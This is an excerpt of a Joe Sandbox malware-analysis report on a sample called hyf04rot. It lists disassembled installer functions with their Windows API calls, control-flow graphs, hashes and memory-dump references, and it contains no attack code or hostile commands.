                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                                              • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                                                                                                                                                                                                              Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                              • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                                              • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                                                                                                                                                                                                              Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                              • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                                              • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                                                                                                                                                                                                                                              Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 004054D2
                                                                                                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 004054E6
                                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                                                                                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                                                                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                                                                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                              • String ID: @rD
                                                                                                                                                                                                                                                                                              • API String ID: 3282139019-3814967855
                                                                                                                                                                                                                                                                                              • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                                              • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                                                                                                                                                                                                                                              Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                              • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                              • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                              • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                              • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                              • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                              • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                              • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                              • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                              • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                              • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                              • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                              • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                              • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                              • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                              • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                              • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                              • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                              • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                              • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                              • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                                                                                                              • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                                                                                                                                                                                                                                              Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                                                                                                                                                                                                                • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                                                                                                                                                                                                              • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                                                                                                                                                                                                                • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                                                                                                                                                                                                              • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                                                                                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
